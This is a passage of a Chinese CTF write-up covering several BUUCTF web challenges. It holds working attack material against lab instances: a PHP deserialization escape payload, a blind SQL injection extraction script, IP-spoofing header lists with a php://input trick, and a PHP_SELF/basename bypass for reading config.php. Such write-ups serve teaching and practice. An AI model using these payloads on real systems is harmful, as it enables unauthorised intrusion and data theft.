POST /update.php HTTP/1.1 Host : hostUser-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language : zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding : gzip, deflateContent-Type : multipart/form-data; boundary=---------------------------220182324341574980971522904828Content-Length : 5743Origin : http://ac29c301-093c-4a3a-8245-b281e663768f.node5.buuoj.cn:81Connection : closeReferer : host/update.phpCookie : PHPSESSID=a68c3e9f08c5f9478a65d7a2274d36afUpgrade-Insecure-Requests : 1Content-Disposition: form-data; name ="phone" 11111111111 Content-Disposition: form-data; name ="email" qq@qq.com Content-Disposition: form-data; name ="nickname[]" wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:" photo";s:10:" config.php";} -----------------------------220182324341574980971522904828 Content-Disposition: form-data; name=" photo"; filename=" 128. png" Content-Type: image/png .......
然后去访问profile.php在图片的位置,拿去解base64
0x2C [FBCTF2019]RCEService
/、*、.等等好多好多都没了,还是找找wp吧,贴一下源码
<?php putenv ('PATH=/home/rceservice/jail' );if (isset ($_REQUEST ['cmd' ])) { $json = $_REQUEST ['cmd' ]; if (!is_string ($json )) { echo 'Hacking attempt detected<br/><br/>' ; } elseif (preg_match ('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/' , $json )) { echo 'Hacking attempt detected<br/><br/>' ; } else { echo 'Attempting to run command:<br/>' ; $cmd = json_decode ($json , true )['cmd' ]; if ($cmd !== NULL ) { system ($cmd ); } else { echo 'Invalid input' ; } echo '<br/><br/>' ; } } ?>
那这里就是涉及preg_match的绕过
本站的另一个文章 有讲,这里就不多说了
额能执行命令了就好办了,因为PATH=/home/rceservice/jail,所以要使用绝对路径来执行命令,例如/bin/cat
flag在/home/rceservice/flag
0x2D [WUSTCTF2020]颜值成绩查询
贴个脚本吧,布尔盲注,先二分法爆长度
import requestsimport timeurl = "http://4fe63558-a1ee-4fdf-bb4a-23c52a0a49b3.node5.buuoj.cn:81/?stunum=" length = 42 resu = "" for i in range (1 ,length+1 ): for j in range (32 ,126 ): payload = f"0^(ascii(substr((select(value)from(flag)),{str (i)} ,1))={str (j)} )" resp = requests.get(url + payload) resp.encoding = resp.apparent_encoding if "student number not exists" in resp.text: continue elif "your score is: 100" in resp.text: resu += chr (j) print (resu) else : print ("Error!" ) print (resp.text) exit(0 ) time.sleep(1 )
0x2E [MRCTF2020]套娃
f12有部分源码
$query = $_SERVER ['QUERY_STRING' ]; if ( substr_count ($query , '_' ) !== 0 || substr_count ($query , '%5f' ) != 0 ){ die ('Y0u are So cutE!' ); } if ($_GET ['b_u_p_t' ] !== '23333' && preg_match ('/^23333$/' , $_GET ['b_u_p_t' ])){ echo "you are going to the next ~" ; } !
只要构造/?b.u.p.t=23333%0a,提示去secrettw.php,有一段jsfuck,直接控制台就好,post传Merak
<?php error_reporting (0 ); include 'takeip.php' ;ini_set ('open_basedir' ,'.' ); include 'flag.php' ;if (isset ($_POST ['Merak' ])){ highlight_file (__FILE__ ); die (); } function change ($v $v = base64_decode ($v ); $re = '' ; for ($i =0 ;$i <strlen ($v );$i ++){ $re .= chr ( ord ($v [$i ]) + $i *2 ); } return $re ; } echo 'Local access only!' ."<br/>" ;$ip = getIp ();if ($ip !='127.0.0.1' )echo "Sorry,you don't have permission! Your ip is :" .$ip ;if ($ip === '127.0.0.1' && file_get_contents ($_GET ['2333' ]) === 'todat is a happy day' ){echo "Your REQUEST is:" .change ($_GET ['file' ]);echo file_get_contents (change ($_GET ['file' ])); }?>
没什么难的,只有一个ip的伪造,X-Forwarded-For不能伪造了,多试试几个
X-Forwarded-For: 127.0 .0.1 X-Forwarded: 127.0 .0.1 Forwarded-For: 127.0 .0.1 Forwarded: 127.0 .0.1 X-Forwarded-Host: 127.0 .0.1 X-remote-IP: 127.0 .0.1 X-remote-addr: 127.0 .0.1 True-Client-IP: 127.0 .0.1 X-Client-IP: 127.0 .0.1 Client-IP: 127.0 .0.1 X-Real-IP: 127.0 .0.1 Ali-CDN-Real-IP: 127.0 .0.1 Cdn-Src-Ip: 127.0 .0.1 Cdn-Real-Ip: 127.0 .0.1 CF-Connecting-IP: 127.0 .0.1 X-Cluster-Client-IP: 127.0 .0.1 WL-Proxy-Client-IP: 127.0 .0.1 Proxy-Client-IP: 127.0 .0.1 Fastly-Client-Ip: 127.0 .0.1 True-Client-Ip: 127.0 .0.1 via: 127.0 .0.1 Host: 127.0 .0.1
file写个小脚本
import base64s = "flag.php" payload = "" for i in range (len (s)): payload+=chr (ord (s[i])-i*2 ) print (base64.b64encode(payload.encode()))
POST /secrettw.php?2333=php://input&file=ZmpdYSZmXGI= HTTP/1.1 Host : d7e324e4-7925-49f6-9d7c-5ec11f04dfae.node5.buuoj.cn:81User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language : zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding : gzip, deflateReferer : http://d7e324e4-7925-49f6-9d7c-5ec11f04dfae.node5.buuoj.cn:81/secrettw.phpContent-Type : application/x-www-form-urlencodedOrigin : http://d7e324e4-7925-49f6-9d7c-5ec11f04dfae.node5.buuoj.cn:81Connection : closeClient-IP : 127.0.0.1Upgrade-Insecure-Requests : 1Content-Length : 20todat is a happy day
image-20240320014847996
0x2F [Zer0pts2020]Can you guess
it?
?source查看源码
<?php include 'config.php' ; if (preg_match ('/config\.php\/*$/i' , $_SERVER ['PHP_SELF' ])) { exit ("I don't know what you are thinking, but I won't let you read it :)" ); } if (isset ($_GET ['source' ])) { highlight_file (basename ($_SERVER ['PHP_SELF' ])); exit (); } $secret = bin2hex (random_bytes (64 ));if (isset ($_POST ['guess' ])) { $guess = (string ) $_POST ['guess' ]; if (hash_equals ($secret , $guess )) { $message = 'Congratulations! The flag is: ' . FLAG; } else { $message = 'Wrong.' ; } } ?>
先取$_SERVER['PHP_SELF'],然后经过basename()取出文件名来读取,只有这个利用点了,下面的hash_equals()是二进制安全的了
$_SERVER['PHP_SELF']是取出网站相对于根目录的地址,即主机名后面的内容,比如http://baidu.com/test/index.html就会取出/test/index.html,然后basename()则是以/分割取最后一个,上面的例子就会取出index.html(只有一个参数时)
我们再来看看preg_match(),这个正则则是匹配含有config.php,并且紧跟着的一定要是以0或多个/结尾的字符串,只有存在这个才会命中正则
如果是/config.php/则basename()只会取出config.php,刚好basename()忽略%80 ~ %ff的字符,所以可以访问、index.php/config.php/%ff等,就能读出config.php,记得加上?source参数才能hightlight_file()
/index.php/config.php/%ff?source
image-20240320033730376
